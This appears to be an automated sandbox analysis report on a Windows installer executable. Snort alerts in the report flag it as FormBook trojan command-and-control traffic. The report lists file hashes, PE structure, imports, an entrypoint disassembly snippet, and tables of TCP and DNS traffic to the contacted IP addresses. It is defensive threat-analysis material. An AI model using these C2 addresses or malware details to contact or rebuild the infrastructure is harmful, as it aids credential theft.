Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir.-.D.-.D.-.D...J..D.-.E.>.D......D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..\|....P.....................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsx546.tmp Download File
Process:	C:\Users\user\Desktop\lpdKSOB78u.exe
File Type:	data
Category:	dropped
Size (bytes):	191414
Entropy (8bit):	7.87694518740932
Encrypted:	false
SSDEEP:	3072:ta7Ug86Ct0w2hlcy7em7/58mdrJqnEFSgbo11gctxilAYhY8Bck+oUgnsBOZwATT:t8UGq0w2PcyaIeEo11gctwhY8pegsI//
MD5:	BB7752BBCB8FD3C0AFD1F7247FFE4122
SHA1:	60ABE13804AF8FC3B8C73512D9D5EF548920804C
SHA-256:	CA2DACE75E51170F2D464B3DC536C5A65CA234E357C8AB7686073E3D2529BA3B
SHA-512:	DEDB3C0E7283973927D37F1ACFF4168FEF6222EF061C2ED5A0D8A0B4E1E811F610C2D7FF1F258DBAFA7A6CE0873118C7E222878D75EAE67D62C10667111B9BE2
Malicious:	false
Preview:	........,...................$...............................................................................................................................................................................................................................................................J...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.894792410239027
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	lpdKSOB78u.exe
File size:	217653
MD5:	f10054d325df455c58ecb16ea660d3f2
SHA1:	54871af48b64576922b97965efeeea94976bc119
SHA256:	b060cb81afd9113cfbbb1e346c99e503c545da47ed80096c021b7ca41c064c76
SHA512:	4ea16d3dbae5b9746aeea79d180b7f1a8932ca8c64bfc95dce1d22376d1d0eada03db8033c1f59212837befa4dc35ad285b1dfc5b6d57d2eda402f968f4b2117
SSDEEP:	6144:K11Q2tLhQtI6Vjw2PcyaseEo11+ctwhY8pggsIPj1ur:QFgNhri1jWhYlg/Pjm
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG._...PG..PF.IPG._...PG..sw..PG..VA..PG.Rich.PG.........PE..L..._.$_.................f...x.......4............@

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x403486
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5F24D75F [Sat Aug 1 02:45:51 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	ea4e67a31ace1a72683a99b80cf37830

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 0040A130h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004080B0h]
call dword ptr [004080C0h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042F44Ch], eax
je 00007F73D894C073h
push ebx
call 00007F73D894F1EEh
cmp eax, ebx
je 00007F73D894C069h
push 00000C00h
call eax
mov esi, 004082A0h
push esi
call 00007F73D894F16Ah
push esi
call dword ptr [004080B8h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F73D894C04Dh
push 0000000Bh
call 00007F73D894F1C2h
push 00000009h
call 00007F73D894F1BBh
push 00000007h
mov dword ptr [0042F444h], eax
call 00007F73D894F1AFh
cmp eax, ebx
je 00007F73D894C071h
push 0000001Eh
call eax
test eax, eax
je 00007F73D894C069h
or byte ptr [0042F44Fh], 00000040h
push ebp
call dword ptr [00408038h]
push ebx
call dword ptr [00408288h]
mov dword ptr [0042F518h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 00429878h
call dword ptr [0040816Ch]
push 0040A1ECh

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8544	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x38000	0x994	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x29c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x65ad	0x6600	False	0.675628063725	data	6.48593060343	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1380	0x1400	False	0.4634765625	data	5.26110074066	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x25558	0x600	False	0.470052083333	data	4.21916068772	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x30000	0x8000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x38000	0x994	0xa00	False	0.459375	data	4.33293034177	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_DIALOG	0x38148	0x100	data	English	United States
RT_DIALOG	0x38248	0x11c	data	English	United States
RT_DIALOG	0x38364	0x60	data	English	United States
RT_VERSION	0x383c4	0x290	MS Windows COFF PA-RISC object file	English	United States
RT_MANIFEST	0x38654	0x340	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
SHELL32.dll	SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
ole32.dll	IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, GetTempFileNameA, RemoveDirectoryA, WriteFile, CreateDirectoryA, GetLastError, CreateProcessA, GlobalLock, GlobalUnlock, CreateThread, lstrcpynA, SetErrorMode, GetDiskFreeSpaceA, lstrlenA, GetCommandLineA, GetVersion, GetWindowsDirectoryA, SetEnvironmentVariableA, GetTempPathA, CopyFileA, GetCurrentProcess, ExitProcess, GetModuleFileNameA, GetFileSize, ReadFile, GetTickCount, Sleep, CreateFileA, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

Version Infos

Description	Data
LegalCopyright	Copyright Nyangbara
FileVersion	28.32.13.56
CompanyName	Sungkai
LegalTrademarks	Template Method Pattern
Comments	colostrum
ProductName	Kalumpang
FileDescription	code of ethics
Translation	0x0409 0x04e4

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
02/23/21-09:19:35.940804	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49735	80	192.168.2.3	23.224.206.45
02/23/21-09:19:35.940804	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49735	80	192.168.2.3	23.224.206.45
02/23/21-09:19:35.940804	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49735	80	192.168.2.3	23.224.206.45
02/23/21-09:19:41.421806	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49740	34.102.136.180	192.168.2.3
02/23/21-09:19:52.076121	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49747	80	192.168.2.3	34.102.136.180
02/23/21-09:19:52.076121	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49747	80	192.168.2.3	34.102.136.180
02/23/21-09:19:52.076121	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49747	80	192.168.2.3	34.102.136.180
02/23/21-09:19:52.215911	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49747	34.102.136.180	192.168.2.3
02/23/21-09:19:57.363088	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49748	80	192.168.2.3	104.21.76.239
02/23/21-09:19:57.363088	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49748	80	192.168.2.3	104.21.76.239
02/23/21-09:19:57.363088	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49748	80	192.168.2.3	104.21.76.239
02/23/21-09:20:13.180762	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49752	80	192.168.2.3	34.102.136.180
02/23/21-09:20:13.180762	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49752	80	192.168.2.3	34.102.136.180
02/23/21-09:20:13.180762	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49752	80	192.168.2.3	34.102.136.180
02/23/21-09:20:13.319901	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49752	34.102.136.180	192.168.2.3
02/23/21-09:20:23.514893	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49753	80	192.168.2.3	34.102.136.180
02/23/21-09:20:23.514893	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49753	80	192.168.2.3	34.102.136.180
02/23/21-09:20:23.514893	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49753	80	192.168.2.3	34.102.136.180
02/23/21-09:20:23.654359	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49753	34.102.136.180	192.168.2.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 09:19:17.709605932 CET	49713	80	192.168.2.3	154.213.108.250
Feb 23, 2021 09:19:18.057991982 CET	80	49713	154.213.108.250	192.168.2.3
Feb 23, 2021 09:19:18.058134079 CET	49713	80	192.168.2.3	154.213.108.250
Feb 23, 2021 09:19:18.058295012 CET	49713	80	192.168.2.3	154.213.108.250
Feb 23, 2021 09:19:18.408178091 CET	80	49713	154.213.108.250	192.168.2.3
Feb 23, 2021 09:19:18.414952040 CET	80	49713	154.213.108.250	192.168.2.3
Feb 23, 2021 09:19:18.415133953 CET	49713	80	192.168.2.3	154.213.108.250
Feb 23, 2021 09:19:18.415177107 CET	49713	80	192.168.2.3	154.213.108.250
Feb 23, 2021 09:19:18.764971972 CET	80	49713	154.213.108.250	192.168.2.3
Feb 23, 2021 09:19:23.588922024 CET	49715	80	192.168.2.3	3.223.115.185
Feb 23, 2021 09:19:23.717184067 CET	80	49715	3.223.115.185	192.168.2.3
Feb 23, 2021 09:19:23.717315912 CET	49715	80	192.168.2.3	3.223.115.185
Feb 23, 2021 09:19:23.717447996 CET	49715	80	192.168.2.3	3.223.115.185
Feb 23, 2021 09:19:23.844760895 CET	80	49715	3.223.115.185	192.168.2.3
Feb 23, 2021 09:19:23.844916105 CET	49715	80	192.168.2.3	3.223.115.185
Feb 23, 2021 09:19:23.844980001 CET	49715	80	192.168.2.3	3.223.115.185
Feb 23, 2021 09:19:23.973321915 CET	80	49715	3.223.115.185	192.168.2.3
Feb 23, 2021 09:19:29.781888008 CET	49722	80	192.168.2.3	208.91.197.27
Feb 23, 2021 09:19:29.945908070 CET	80	49722	208.91.197.27	192.168.2.3
Feb 23, 2021 09:19:29.945982933 CET	49722	80	192.168.2.3	208.91.197.27
Feb 23, 2021 09:19:29.946145058 CET	49722	80	192.168.2.3	208.91.197.27
Feb 23, 2021 09:19:30.150914907 CET	80	49722	208.91.197.27	192.168.2.3
Feb 23, 2021 09:19:30.277334929 CET	80	49722	208.91.197.27	192.168.2.3
Feb 23, 2021 09:19:30.277365923 CET	80	49722	208.91.197.27	192.168.2.3
Feb 23, 2021 09:19:30.277400970 CET	80	49722	208.91.197.27	192.168.2.3
Feb 23, 2021 09:19:30.277434111 CET	49722	80	192.168.2.3	208.91.197.27
Feb 23, 2021 09:19:30.354926109 CET	80	49722	208.91.197.27	192.168.2.3
Feb 23, 2021 09:19:30.354985952 CET	49722	80	192.168.2.3	208.91.197.27
Feb 23, 2021 09:19:30.439970970 CET	80	49722	208.91.197.27	192.168.2.3
Feb 23, 2021 09:19:30.461776972 CET	49722	80	192.168.2.3	208.91.197.27
Feb 23, 2021 09:19:30.517585039 CET	80	49722	208.91.197.27	192.168.2.3
Feb 23, 2021 09:19:30.517618895 CET	80	49722	208.91.197.27	192.168.2.3
Feb 23, 2021 09:19:30.517644882 CET	49722	80	192.168.2.3	208.91.197.27
Feb 23, 2021 09:19:30.517679930 CET	49722	80	192.168.2.3	208.91.197.27
Feb 23, 2021 09:19:30.624599934 CET	80	49722	208.91.197.27	192.168.2.3
Feb 23, 2021 09:19:30.624634981 CET	80	49722	208.91.197.27	192.168.2.3
Feb 23, 2021 09:19:30.624664068 CET	49722	80	192.168.2.3	208.91.197.27
Feb 23, 2021 09:19:30.624696970 CET	49722	80	192.168.2.3	208.91.197.27
Feb 23, 2021 09:19:30.680015087 CET	80	49722	208.91.197.27	192.168.2.3
Feb 23, 2021 09:19:30.680063009 CET	49722	80	192.168.2.3	208.91.197.27
Feb 23, 2021 09:19:35.726249933 CET	49735	80	192.168.2.3	23.224.206.45
Feb 23, 2021 09:19:35.940552950 CET	80	49735	23.224.206.45	192.168.2.3
Feb 23, 2021 09:19:35.940700054 CET	49735	80	192.168.2.3	23.224.206.45
Feb 23, 2021 09:19:35.940804005 CET	49735	80	192.168.2.3	23.224.206.45
Feb 23, 2021 09:19:36.155071974 CET	80	49735	23.224.206.45	192.168.2.3
Feb 23, 2021 09:19:36.158428907 CET	80	49735	23.224.206.45	192.168.2.3
Feb 23, 2021 09:19:36.158538103 CET	49735	80	192.168.2.3	23.224.206.45
Feb 23, 2021 09:19:36.158598900 CET	49735	80	192.168.2.3	23.224.206.45
Feb 23, 2021 09:19:36.373198986 CET	80	49735	23.224.206.45	192.168.2.3
Feb 23, 2021 09:19:41.237212896 CET	49740	80	192.168.2.3	34.102.136.180
Feb 23, 2021 09:19:41.278170109 CET	80	49740	34.102.136.180	192.168.2.3
Feb 23, 2021 09:19:41.279773951 CET	49740	80	192.168.2.3	34.102.136.180
Feb 23, 2021 09:19:41.279925108 CET	49740	80	192.168.2.3	34.102.136.180
Feb 23, 2021 09:19:41.321942091 CET	80	49740	34.102.136.180	192.168.2.3
Feb 23, 2021 09:19:41.421806097 CET	80	49740	34.102.136.180	192.168.2.3
Feb 23, 2021 09:19:41.421829939 CET	80	49740	34.102.136.180	192.168.2.3
Feb 23, 2021 09:19:41.421947956 CET	49740	80	192.168.2.3	34.102.136.180
Feb 23, 2021 09:19:41.422008038 CET	49740	80	192.168.2.3	34.102.136.180
Feb 23, 2021 09:19:41.462946892 CET	80	49740	34.102.136.180	192.168.2.3
Feb 23, 2021 09:19:46.514878035 CET	49746	80	192.168.2.3	23.253.73.122
Feb 23, 2021 09:19:46.672138929 CET	80	49746	23.253.73.122	192.168.2.3
Feb 23, 2021 09:19:46.672233105 CET	49746	80	192.168.2.3	23.253.73.122
Feb 23, 2021 09:19:46.672395945 CET	49746	80	192.168.2.3	23.253.73.122
Feb 23, 2021 09:19:46.848619938 CET	80	49746	23.253.73.122	192.168.2.3
Feb 23, 2021 09:19:46.848833084 CET	49746	80	192.168.2.3	23.253.73.122
Feb 23, 2021 09:19:46.901863098 CET	49746	80	192.168.2.3	23.253.73.122
Feb 23, 2021 09:19:47.058953047 CET	80	49746	23.253.73.122	192.168.2.3
Feb 23, 2021 09:19:52.034972906 CET	49747	80	192.168.2.3	34.102.136.180
Feb 23, 2021 09:19:52.075805902 CET	80	49747	34.102.136.180	192.168.2.3
Feb 23, 2021 09:19:52.075917006 CET	49747	80	192.168.2.3	34.102.136.180
Feb 23, 2021 09:19:52.076121092 CET	49747	80	192.168.2.3	34.102.136.180
Feb 23, 2021 09:19:52.118194103 CET	80	49747	34.102.136.180	192.168.2.3
Feb 23, 2021 09:19:52.215910912 CET	80	49747	34.102.136.180	192.168.2.3
Feb 23, 2021 09:19:52.215934992 CET	80	49747	34.102.136.180	192.168.2.3
Feb 23, 2021 09:19:52.216115952 CET	49747	80	192.168.2.3	34.102.136.180
Feb 23, 2021 09:19:52.216259956 CET	49747	80	192.168.2.3	34.102.136.180
Feb 23, 2021 09:19:52.257479906 CET	80	49747	34.102.136.180	192.168.2.3
Feb 23, 2021 09:19:57.300996065 CET	49748	80	192.168.2.3	104.21.76.239
Feb 23, 2021 09:19:57.362636089 CET	80	49748	104.21.76.239	192.168.2.3
Feb 23, 2021 09:19:57.362773895 CET	49748	80	192.168.2.3	104.21.76.239
Feb 23, 2021 09:19:57.363087893 CET	49748	80	192.168.2.3	104.21.76.239
Feb 23, 2021 09:19:57.424618006 CET	80	49748	104.21.76.239	192.168.2.3
Feb 23, 2021 09:19:57.433413982 CET	80	49748	104.21.76.239	192.168.2.3
Feb 23, 2021 09:19:57.433438063 CET	80	49748	104.21.76.239	192.168.2.3
Feb 23, 2021 09:19:57.433561087 CET	49748	80	192.168.2.3	104.21.76.239
Feb 23, 2021 09:19:57.433666945 CET	49748	80	192.168.2.3	104.21.76.239
Feb 23, 2021 09:19:57.495332003 CET	80	49748	104.21.76.239	192.168.2.3
Feb 23, 2021 09:20:07.753549099 CET	49749	80	192.168.2.3	92.249.45.191
Feb 23, 2021 09:20:07.902614117 CET	80	49749	92.249.45.191	192.168.2.3
Feb 23, 2021 09:20:07.902734041 CET	49749	80	192.168.2.3	92.249.45.191
Feb 23, 2021 09:20:07.902918100 CET	49749	80	192.168.2.3	92.249.45.191
Feb 23, 2021 09:20:08.052596092 CET	80	49749	92.249.45.191	192.168.2.3
Feb 23, 2021 09:20:08.052963018 CET	80	49749	92.249.45.191	192.168.2.3
Feb 23, 2021 09:20:08.052984953 CET	80	49749	92.249.45.191	192.168.2.3
Feb 23, 2021 09:20:08.052998066 CET	80	49749	92.249.45.191	192.168.2.3
Feb 23, 2021 09:20:08.053105116 CET	49749	80	192.168.2.3	92.249.45.191
Feb 23, 2021 09:20:08.053309917 CET	49749	80	192.168.2.3	92.249.45.191
Feb 23, 2021 09:20:08.053509951 CET	80	49749	92.249.45.191	192.168.2.3
Feb 23, 2021 09:20:08.053587914 CET	49749	80	192.168.2.3	92.249.45.191
Feb 23, 2021 09:20:08.204560995 CET	80	49749	92.249.45.191	192.168.2.3
Feb 23, 2021 09:20:13.139748096 CET	49752	80	192.168.2.3	34.102.136.180
Feb 23, 2021 09:20:13.180533886 CET	80	49752	34.102.136.180	192.168.2.3
Feb 23, 2021 09:20:13.180614948 CET	49752	80	192.168.2.3	34.102.136.180
Feb 23, 2021 09:20:13.180762053 CET	49752	80	192.168.2.3	34.102.136.180
Feb 23, 2021 09:20:13.221359968 CET	80	49752	34.102.136.180	192.168.2.3
Feb 23, 2021 09:20:13.319900990 CET	80	49752	34.102.136.180	192.168.2.3
Feb 23, 2021 09:20:13.319926977 CET	80	49752	34.102.136.180	192.168.2.3
Feb 23, 2021 09:20:13.320116043 CET	49752	80	192.168.2.3	34.102.136.180
Feb 23, 2021 09:20:13.320328951 CET	49752	80	192.168.2.3	34.102.136.180
Feb 23, 2021 09:20:13.362207890 CET	80	49752	34.102.136.180	192.168.2.3
Feb 23, 2021 09:20:23.471981049 CET	49753	80	192.168.2.3	34.102.136.180
Feb 23, 2021 09:20:23.514585972 CET	80	49753	34.102.136.180	192.168.2.3
Feb 23, 2021 09:20:23.514774084 CET	49753	80	192.168.2.3	34.102.136.180
Feb 23, 2021 09:20:23.514893055 CET	49753	80	192.168.2.3	34.102.136.180
Feb 23, 2021 09:20:23.555820942 CET	80	49753	34.102.136.180	192.168.2.3
Feb 23, 2021 09:20:23.654359102 CET	80	49753	34.102.136.180	192.168.2.3
Feb 23, 2021 09:20:23.654386044 CET	80	49753	34.102.136.180	192.168.2.3
Feb 23, 2021 09:20:23.654694080 CET	49753	80	192.168.2.3	34.102.136.180
Feb 23, 2021 09:20:23.654719114 CET	49753	80	192.168.2.3	34.102.136.180
Feb 23, 2021 09:20:23.696799994 CET	80	49753	34.102.136.180	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 09:18:13.109071970 CET	50620	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:18:13.167468071 CET	53	50620	8.8.8.8	192.168.2.3
Feb 23, 2021 09:18:13.237102985 CET	64938	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:18:13.298345089 CET	53	64938	8.8.8.8	192.168.2.3
Feb 23, 2021 09:18:14.597481012 CET	60152	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:18:14.648981094 CET	53	60152	8.8.8.8	192.168.2.3
Feb 23, 2021 09:18:41.895658016 CET	57544	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:18:41.944113970 CET	53	57544	8.8.8.8	192.168.2.3
Feb 23, 2021 09:18:43.023251057 CET	55984	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:18:43.074654102 CET	53	55984	8.8.8.8	192.168.2.3
Feb 23, 2021 09:18:46.141314983 CET	64185	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:18:46.199933052 CET	53	64185	8.8.8.8	192.168.2.3
Feb 23, 2021 09:19:00.944809914 CET	65110	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:19:00.997602940 CET	53	65110	8.8.8.8	192.168.2.3
Feb 23, 2021 09:19:05.573760033 CET	58361	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:19:05.632469893 CET	53	58361	8.8.8.8	192.168.2.3
Feb 23, 2021 09:19:13.394813061 CET	63492	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:19:13.443514109 CET	53	63492	8.8.8.8	192.168.2.3
Feb 23, 2021 09:19:17.523621082 CET	60831	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:19:17.702505112 CET	53	60831	8.8.8.8	192.168.2.3
Feb 23, 2021 09:19:23.299504995 CET	60100	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:19:23.350155115 CET	53	60100	8.8.8.8	192.168.2.3
Feb 23, 2021 09:19:23.433437109 CET	53195	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:19:23.587986946 CET	53	53195	8.8.8.8	192.168.2.3
Feb 23, 2021 09:19:24.895694017 CET	50141	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:19:24.944336891 CET	53	50141	8.8.8.8	192.168.2.3
Feb 23, 2021 09:19:26.003376007 CET	53023	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:19:26.052035093 CET	53	53023	8.8.8.8	192.168.2.3
Feb 23, 2021 09:19:26.505979061 CET	49563	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:19:26.574804068 CET	53	49563	8.8.8.8	192.168.2.3
Feb 23, 2021 09:19:27.267761946 CET	51352	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:19:27.336662054 CET	53	51352	8.8.8.8	192.168.2.3
Feb 23, 2021 09:19:27.537915945 CET	59349	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:19:27.588455915 CET	53	59349	8.8.8.8	192.168.2.3
Feb 23, 2021 09:19:28.308531046 CET	57084	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:19:28.365628004 CET	53	57084	8.8.8.8	192.168.2.3
Feb 23, 2021 09:19:29.580148935 CET	58823	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:19:29.757343054 CET	53	58823	8.8.8.8	192.168.2.3
Feb 23, 2021 09:19:29.857853889 CET	57568	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:19:29.869638920 CET	50540	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:19:29.918586016 CET	53	57568	8.8.8.8	192.168.2.3
Feb 23, 2021 09:19:29.919332981 CET	53	50540	8.8.8.8	192.168.2.3
Feb 23, 2021 09:19:30.287633896 CET	54366	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:19:30.360156059 CET	53	54366	8.8.8.8	192.168.2.3
Feb 23, 2021 09:19:30.753460884 CET	53034	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:19:30.810342073 CET	53	53034	8.8.8.8	192.168.2.3
Feb 23, 2021 09:19:31.004024029 CET	57762	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:19:31.055495977 CET	53	57762	8.8.8.8	192.168.2.3
Feb 23, 2021 09:19:31.646888018 CET	55435	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:19:31.704104900 CET	53	55435	8.8.8.8	192.168.2.3
Feb 23, 2021 09:19:32.155848980 CET	50713	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:19:32.208286047 CET	53	50713	8.8.8.8	192.168.2.3
Feb 23, 2021 09:19:32.587729931 CET	56132	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:19:32.648315907 CET	53	56132	8.8.8.8	192.168.2.3
Feb 23, 2021 09:19:33.364005089 CET	58987	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:19:33.415467024 CET	53	58987	8.8.8.8	192.168.2.3
Feb 23, 2021 09:19:33.951195955 CET	56579	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:19:34.011198997 CET	53	56579	8.8.8.8	192.168.2.3
Feb 23, 2021 09:19:34.285038948 CET	60633	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:19:34.336524963 CET	53	60633	8.8.8.8	192.168.2.3
Feb 23, 2021 09:19:35.511317968 CET	61292	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:19:35.565466881 CET	63619	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:19:35.614231110 CET	53	63619	8.8.8.8	192.168.2.3
Feb 23, 2021 09:19:35.676973104 CET	64938	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:19:35.724052906 CET	53	61292	8.8.8.8	192.168.2.3
Feb 23, 2021 09:19:35.736579895 CET	53	64938	8.8.8.8	192.168.2.3
Feb 23, 2021 09:19:36.271919966 CET	61946	53	192.168.2.3	8.8.8.8
